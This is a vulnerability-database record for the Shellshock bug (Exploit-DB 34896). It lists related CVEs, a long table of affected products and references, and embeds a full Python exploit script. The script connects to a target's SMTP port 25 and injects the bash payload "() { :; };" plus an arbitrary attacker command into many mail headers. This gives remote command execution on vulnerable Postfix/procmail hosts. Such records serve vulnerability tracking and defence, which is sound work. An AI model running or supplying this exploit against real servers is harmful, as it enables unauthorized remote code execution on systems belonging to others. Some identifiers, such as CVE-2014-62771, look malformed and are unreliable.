Details of VAR-E-201409-0563

ID

VAR-E-201409-0563

CVE

cve_id:	CVE-2014-7910	Trust: 1.0
cve_id:	CVE-2014-7227	Trust: 1.0
cve_id:	CVE-2014-7196	Trust: 1.0
cve_id:	CVE-2014-7169	Trust: 1.0
cve_id:	CVE-2014-62771	Trust: 1.0
cve_id:	CVE-2014-6271	Trust: 1.0
cve_id:	CVE-2014-3671	Trust: 1.0
cve_id:	CVE-2014-3659	Trust: 1.0
cve_id:	CVE-2014-6277	Trust: 0.3

sources: BID: 70165 // EXPLOIT-DB: 34896

EDB ID

34896

TITLE

Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection - Linux remote Exploit

Trust: 1.0

sources: EXPLOIT-DB: 34896

DESCRIPTION

Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection. CVE-2014-7910CVE-2014-7227CVE-2014-7196CVE-2014-7169CVE-112004CVE-2014-62771CVE-2014-6271CVE-2014-3671CVE-2014-3659 . remote exploit for Linux platform

Trust: 1.0

sources: EXPLOIT-DB: 34896

AFFECTED PRODUCTS

vendor:	postfix	model:	smtp	scope:	eq	version:	4.2.x<4.2.48	Trust: 1.0
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5	Trust: 0.6
vendor:	xerox	model:	workcentre	scope:	eq	version:	7245	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7242	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7238	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7235	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7232	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7228	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	78000	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	67000	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9393	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9303	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9302	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9301	Trust: 0.3
vendor:	ubuntu	model:	linux lts i386	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux lts amd64	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux sparc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.04	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	11	Trust: 0.3
vendor:	redhat	model:	enterprise linux	scope:	eq	version:	5.0	Trust: 0.3
vendor:	redhat	model:	enterprise linux client	scope:	eq	version:	5	Trust: 0.3
vendor:	red	model:	hat enterprise linux workstation	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux server	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux long life server	scope:	eq	version:	5.6	Trust: 0.3
vendor:	red	model:	hat enterprise linux hpc node	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux server	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.2	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.1	Trust: 0.3
vendor:	oracle	model:	linux	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6.2	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.3
vendor:	mcafee	model:	email gateway patch	scope:	eq	version:	7.01	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.0	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.22	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.21	Trust: 0.3
vendor:	ibm	model:	ds8000	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	7.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	6.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	5.3	Trust: 0.3
vendor:	hp	model:	insight control	scope:	eq	version:	0	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.1.4	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.0.16	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	4.2	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	4.1	Trust: 0.3
vendor:	gnu	model:	bash rc1	scope:	eq	version:	4.0	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	4.0	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.2.48	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.2	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.00.0(2)	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	3.0	Trust: 0.3
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.3
vendor:	cosmicperl	model:	directory pro	scope:	eq	version:	10.0.3	Trust: 0.3
vendor:	cisco	model:	wide area application services	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified contact center express	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	network analysis module	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	mds	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	gss 4492r global site selector	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	emergency responder	scope:	eq	version:	1.1	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	5.0	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	show and share	scope:	eq	version:	5(2)	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16.2	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.11	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.10	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.9	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.9	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.0.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.0.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.0.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.03	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.0	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6	Trust: 0.3

sources: BID: 70165 // EXPLOIT-DB: 34896

EXPLOIT

#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271

from socket import *
import sys

def usage():
print "shellshock_smtp.py <target> <command>"

argc = len(sys.argv)
if(argc < 3 or argc > 3):
usage()
sys.exit(0)

rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]

headers = ([
"To",
"References",
"Cc",
"Bcc",
"From",
"Subject",
"Date",
"Message-ID",
"Comments",
"Keywords",
"Resent-Date",
"Resent-From",
"Resent-Sender"
])

s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))

# banner grab
s.recv(2048*4)

def netFormat(d):
d += "\n"
return d.encode('hex').decode('hex')

data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)

data = netFormat("rcpt to:<nobody>")
s.send(data)
s.recv(2048*4)

data = netFormat("data")
s.send(data)
s.recv(2048*4)

data = ''
for h in headers:
data += netFormat(h + ":() { :; };" + cmd)

data += netFormat(cmd)

# <CR><LF>.<CR><LF>
data += "0d0a2e0d0a".decode('hex')

s.send(data)
s.recv(2048*4)

data = netFormat("quit")
s.send(data)
s.recv(2048*4)

Trust: 1.0

sources: EXPLOIT-DB: 34896

EXPLOIT LANGUAGE

Trust: 1.0

sources: EXPLOIT-DB: 34896

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 34896

TYPE

'Shellshock' Remote Command Injection

Trust: 1.0

sources: EXPLOIT-DB: 34896

CREDITS

Phil Blank

Trust: 1.0

sources: EXPLOIT-DB: 34896

EXTERNAL IDS

db:	NVD	id:	CVE-2014-3671	Trust: 1.0
db:	NVD	id:	CVE-2014-7196	Trust: 1.0
db:	NVD	id:	CVE-2014-7227	Trust: 1.0
db:	NVD	id:	CVE-2014-7910	Trust: 1.0
db:	NVD	id:	CVE-2014-7169	Trust: 1.0
db:	NVD	id:	CVE-2014-62771	Trust: 1.0
db:	NVD	id:	CVE-2014-6271	Trust: 1.0
db:	NVD	id:	CVE-2014-3659	Trust: 1.0
db:	EXPLOIT-DB	id:	34896	Trust: 1.0
db:	NVD	id:	CVE-2014-6277	Trust: 0.3
db:	BID	id:	70165	Trust: 0.3

sources: BID: 70165 // EXPLOIT-DB: 34896

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2014-7910	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-7169	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-6271	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-62771	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-7196	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-3659	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-7227	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-3671	Trust: 1.0
url:	http://www.gnu.org/software/bash/	Trust: 0.3

sources: BID: 70165 // EXPLOIT-DB: 34896

SOURCES

db:	BID	id:	70165
db:	EXPLOIT-DB	id:	34896

LAST UPDATE DATE

2023-05-30T11:41:27.230000+00:00

SOURCES UPDATE DATE

db:

BID

id:

70165

date:

2015-10-26T16:51:00

SOURCES RELEASE DATE

db:	BID	id:	70165	date:	2014-09-27T00:00:00
db:	EXPLOIT-DB	id:	34896	date:	2014-10-06T00:00:00